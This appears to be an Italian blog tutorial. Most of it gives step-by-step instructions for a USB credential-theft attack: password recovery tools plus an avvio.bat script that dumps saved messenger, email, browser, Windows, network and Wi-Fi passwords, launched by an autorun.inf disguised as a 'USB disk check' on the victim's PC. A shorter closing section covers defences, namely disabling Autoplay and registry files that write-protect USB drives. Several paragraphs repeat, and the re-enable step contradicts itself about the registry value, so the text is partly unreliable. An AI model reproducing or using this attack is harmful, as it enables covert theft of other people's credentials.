Avete mai pensato che qualcuno inserendo la chiavetta usb nel pc possa rubarvi le password?
Vi spiegherò passo dopo passo come fare e come proteggerci.
Procuriamoci i seguenti programmi:
- MessenPass (recupera le password dei programmi di messaggistica istantanea tipo MSN);
- Mail PassView (recupera le password dei principali client di posta elettronica);
- IE Passview (password di internet explorer);
- Protect Storage PassView (password di windows);
- Password Fox (password di firefox);
- Netpass (password di rete);
- WirelessKeyView (password wireless).
Basta anche fare una ricerca per scoprire altri programmi che fanno questo lavoro.
Dopo aver scaricato questi programmi bisogna copiarli nella chiavetta usb.
A questo punto apriamo il blocco note (Start – Tutti i Programmi – Accessori – Blocco note) e copiamo al suo interno:
|
1 2 3 4 5 6 7 |
@mspass.exe /stext mspass.txt @mailpv.exe /stext mailpv.txt @iepv.exe /stext iepv.txt @pspv.exe /stext pspv.txt @passwordfox.exe /stext passwordfox.txt @netpass.exe /stext netpass.txt @WirelessKeyView.exe /stext WirelessKeyView.txt |
Salviamo con nome da File – Salva con nome…
in Salva come: selezionamo Tutti i file (*.*)
in nome file mettiamo avvio.bat
Il file appena generato contiene le istruzioni che il computer deve eseguire. Ora dobbiamo dire alla macchina che non appena inseriamo la usb deve eseguire il file batch che abbiamo appena generato.
Sempre col blocco note copiamo quanto segue:
in Salva come: selezionamo Tutti i file (*.*)
in nome file mettiamo avvio.bat
Il file appena generato contiene le istruzioni che il computer deve eseguire. Ora dobbiamo dire alla macchina che non appena inseriamo la usb deve eseguire il file batch che abbiamo appena generato.
Sempre col blocco note copiamo quanto segue:
|
1 2 3 |
[autorun] open=avvio.bat ACTION= Controllo Disco USB |
Salviamo con nome da File – Salva con nome…
in Salva come: selezionamo Tutti i file (*.*)
in nome file mettiamo autorun.inf
Fatto ciò dobbiamo avere nella chiavetta a parte i programmi per recuperare le password anche i due files appena creati col blocco note: avvio.bat e autorun.inf
Il gioco è fatto, basta inserire la chiavetta usb nel pc della vittima e si avvierà la procedura. Nella schermata di avvio selezionamo Controllo Disco USB e al termine ci ritroviamo dei files di testo contenente tutte le password, un file per ogni programma.
Ovviamente se vogliamo possiamo aggiungere o sostituire gli eseguibili (programmi per recuperare le psw), basta fare un giro su internet e dai risultati ottenuti vediamo che spuntano come i funghi, però dobbiamo ricordare di modificare il file batch aggiungendo o modificando i nomi degli eseguibili.
Il gioco è fatto, basta inserire la chiavetta usb nel pc della vittima e si avvierà la procedura. Nella schermata di avvio selezionamo Controllo Disco USB e al termine ci ritroviamo dei files di testo contenente tutte le password, un file per ogni programma.
Ovviamente se vogliamo possiamo aggiungere o sostituire gli eseguibili (programmi per recuperare le psw), basta fare un giro su internet e dai risultati ottenuti vediamo che spuntano come i funghi, però dobbiamo ricordare di modificare il file batch aggiungendo o modificando i nomi degli eseguibili.
ABILITARE O DISABILITARE LA SCRITTURA SU CHIAVETTE USB
Con questa consapevolezza di vulnerabilità possiamo prendere le giuste precauzioni, proteggendo il pc o ingannandolo in due modi:
- disabilitando l’auto-play;
- impedendogli di scrivere sui supporti rimovibili (usb).
Iniziamo con la disattivazione dell’auto play:
Click su Start e nella casella di ricerca scriviamo gpedit.msc e premere invio, si aprirà l’Editor Criteri di gruppo locali.
Nel riquadro a sx, click su Configurazione computer – Modelli amministrativi – Componenti di Windows – Criter Autoplay nel riquadro a dx doppio click su Disattiva Autoplay si aprirà una schermata con la voce selezionata in Non configurata, quindi click su Attivata e in Opzioni (in basso a sx) selezionare Tutte le unità.
Nel riquadro a sx, click su Configurazione computer – Modelli amministrativi – Componenti di Windows – Criter Autoplay nel riquadro a dx doppio click su Disattiva Autoplay si aprirà una schermata con la voce selezionata in Non configurata, quindi click su Attivata e in Opzioni (in basso a sx) selezionare Tutte le unità.
Alternativa:
click su Start e nella casella di ricerca scriviamo autoplay e premere invio, nella schermata togliere la spunta su Utilizza AutoPlay per tutti i supporti e tutti i dispositivi.
Possiamo anche farlo tramite registro di sistema sia manualmente che in automatico tramite l’impostazione da file .reg, spiegherò l’alternativa a questa procedura in un prossimo articolo..
Passiamo ora al metodo successivo per impostare le usb in sola lettura e impedire la scrittura di dati in esse.
Possiamo anche farlo tramite registro di sistema sia manualmente che in automatico tramite l’impostazione da file .reg, spiegherò l’alternativa a questa procedura in un prossimo articolo..
Passiamo ora al metodo successivo per impostare le usb in sola lettura e impedire la scrittura di dati in esse.
Apriamo il blocco note e scriviamo:
|
1 2 3 |
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies] "WriteProtect"=dword:00000001 |
Salviamo con nome da File – Salva con nome…
in Salva come: selezionamo Tutti i file (*.*) in nome file mettiamo Disabilita scrittura su usb.reg
Abbiamo creato il file che impedisce la scrittura su usb, basta aprirlo e cliccare su si, un messaggio ci dirà che è stata inserita la voce con successo. Se vogliamo possiamo ripristinare il tutto cambiando il valore da 0 a 1, quindi stessa procedura da blocco note col seguente codice:
|
1 2 3 |
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies] "WriteProtect"=dword:00000000 |
Salviamo con nome da File – Salva con nome…
in Salva come: selezionamo Tutti i file (*.*)
in nome file mettiamo Abilita scrittura su usb.reg
Se vogliamo fare questo lavoro manualmente click su Start e nella casella di ricerca digitare regedit e poi invio, seguiamo il percorso (nel riquadro a sx) HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies nel riquadro a destra doppio click su WriteProtect e scrivere 0, click su ok e chiudere.
in Salva come: selezionamo Tutti i file (*.*)
in nome file mettiamo Abilita scrittura su usb.reg
Se vogliamo fare questo lavoro manualmente click su Start e nella casella di ricerca digitare regedit e poi invio, seguiamo il percorso (nel riquadro a sx) HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies nel riquadro a destra doppio click su WriteProtect e scrivere 0, click su ok e chiudere.
